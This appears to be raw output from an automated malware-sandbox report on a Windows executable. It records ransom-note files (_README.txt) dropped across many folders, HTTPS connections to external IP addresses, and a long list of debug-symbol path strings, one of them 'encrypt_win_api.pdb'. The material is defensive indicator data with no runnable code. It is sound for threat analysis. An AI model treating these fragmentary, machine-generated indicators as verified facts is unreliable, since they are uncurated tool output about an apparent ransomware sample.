            Source: qJKiVKZdFk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\_README.txtJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\$WinREAgent\_README.txtJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\$WinREAgent\Scratch\_README.txtJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\_README.txtJump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile created: C:\_README.txt
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile created: C:\Users\user\_README.txt
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.65.44.84:443 -> 192.168.2.7:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.7:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49727 version: TLS 1.2
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1926192275.0000000003771000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905377607.0000000003742000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\> source: qJKiVKZdFk.exe, 00000006.00000003.1551570140.0000000003263000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\AC\\ source: qJKiVKZdFk.exe, 00000006.00000003.1968685597.0000000003176000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969530597.000000000317B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1968389947.0000000003176000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\he\\ source: qJKiVKZdFk.exe, 00000006.00000003.1948134617.00000000034EF000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1949224484.000000000355B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1927157486.000000000354F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\te\ source: qJKiVKZdFk.exe, 00000006.00000003.1821869858.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820899366.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s\ source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1893229623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894415896.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1895434021.00000000033AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\* source: qJKiVKZdFk.exe, 00000006.00000003.1426844364.0000000003170000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\jW source: qJKiVKZdFk.exe, 00000006.00000003.1820515304.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893835216.0000000003331000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1895058945.0000000003354000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893453557.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: qJKiVKZdFk.exe, 00000006.00000003.1988116546.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970773015.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\leveyezazolec cafuvi_21.pdb source: qJKiVKZdFk.exe, 00000000.00000002.1210556297.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000000.00000000.1204142852.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000002.00000000.1207754715.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000005.00000002.1241940715.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000005.00000000.1234443220.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1352556517.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000000.1237625496.0000000000411000.00000002.00000001.01000000.00000003.sdmp, qJKiVKZdFk.exe, 0000001F.00000000.1473889075.0000000000411000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\7X8i+ source: qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1984945537.0000000003626000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\`K source: qJKiVKZdFk.exe, 00000006.00000003.1912241580.00000000036A2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892669784.000000000362C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1906239278.0000000003409000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893166302.0000000003409000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1913784424.0000000003410000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905966303.0000000003342000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\6\ source: qJKiVKZdFk.exe, 00000006.00000003.1911745285.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\okies\F source: qJKiVKZdFk.exe, 00000006.00000003.1988116546.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: qJKiVKZdFk.exe, 00000006.00000003.1967923410.000000000338D000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967480425.0000000003308000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: qJKiVKZdFk.exe
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: qJKiVKZdFk.exe, 00000006.00000003.1948134617.00000000034EF000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1949224484.000000000355B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1950136140.000000000362B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1948942688.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1944400826.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1948262731.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1927157486.000000000354F000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1926994828.000000000362B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\we\ source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\s\Micr source: qJKiVKZdFk.exe, 00000006.00000003.1485860716.000000000312B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\" source: qJKiVKZdFk.exe, 00000006.00000003.1551027154.000000000316D000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1439917837.0000000003168000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1485598960.0000000003152000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\Temp\.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1944400826.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1947978051.00000000036AD000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1971625636.000000000369C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970280763.000000000368D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\c source: qJKiVKZdFk.exe, 00000006.00000003.1485423577.00000000033B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\g` source: qJKiVKZdFk.exe, 00000006.00000003.1426844364.0000000003170000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qJKiVKZdFk.exe, 00000006.00000003.1337962909.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\tate\ source: qJKiVKZdFk.exe, 00000006.00000003.1820851126.000000000314E000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1822028056.0000000003151000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1822181040.000000000315A000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1485598960.0000000003152000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\]H source: qJKiVKZdFk.exe, 00000006.00000003.1912241580.00000000036A2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892669784.000000000362C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\he\ source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: qJKiVKZdFk.exe, 00000006.00000003.1551083347.000000000313D000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893357423.000000000313F000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1485860716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1822460811.000000000313F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: qJKiVKZdFk.exe, 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: qJKiVKZdFk.exe, 00000006.00000003.1551083347.000000000313D000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820851126.000000000314E000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1485860716.0000000003135000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1968989849.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1987568231.0000000003741000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1966872364.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1985741698.00000000036EE000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1987322234.0000000003732000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: qJKiVKZdFk.exe, 00000006.00000003.1930983614.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1913718780.0000000003623000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1912344171.0000000003614000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1929959583.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1926994828.000000000357F000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\mp\ source: qJKiVKZdFk.exe, 00000006.00000003.1950136140.000000000362B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1948942688.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1944400826.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1948262731.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1926994828.000000000362B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\1' source: qJKiVKZdFk.exe, 00000006.00000003.1893698935.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894472590.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894820733.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893025581.000000000359B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: qJKiVKZdFk.exe, 00000006.00000003.1968989849.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1966872364.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1985741698.00000000036EE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AC\Temp\.pdb> source: qJKiVKZdFk.exe, 00000006.00000003.1820515304.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893835216.0000000003331000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1895058945.0000000003354000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893453557.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\pData\ source: qJKiVKZdFk.exe, 00000006.00000003.1911745285.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\mp\y\ source: qJKiVKZdFk.exe, 00000006.00000003.1984677357.000000000313F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\y\\HR source: qJKiVKZdFk.exe, 00000006.00000003.1988116546.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ngs\j source: qJKiVKZdFk.exe, 00000006.00000003.1895972920.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1821139434.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893524746.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894099107.00000000032E9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1821342855.00000000032E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\AC\ source: qJKiVKZdFk.exe, 00000006.00000003.1948815089.0000000003261000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970106720.0000000003280000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1968303351.0000000003279000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\s\ source: qJKiVKZdFk.exe, 00000006.00000003.1981634887.0000000003308000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\ source: qJKiVKZdFk.exe, 00000006.00000003.1986500910.0000000003B21000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1983244981.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1986448988.00000000036B1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1986375047.0000000003644000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\- source: qJKiVKZdFk.exe, 00000006.00000003.1948815089.0000000003261000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970106720.0000000003280000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1968303351.0000000003279000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\V source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.0000000000902000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ek source: qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.0000000003603000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1913718780.0000000003623000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1912344171.0000000003614000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905810552.00000000035F0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\5 source: qJKiVKZdFk.exe, 00000006.00000003.1821869858.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820899366.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550839273.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550986093.00000000032D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1926192275.0000000003771000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905377607.0000000003742000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1820851126.000000000314E000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893025581.000000000359B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894660851.000000000359C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\n source: qJKiVKZdFk.exe, 00000006.00000003.1930983614.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1911745285.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905574166.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1929959583.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1926994828.000000000357F000.00000004.00000020.00020000.00000000.sdmp
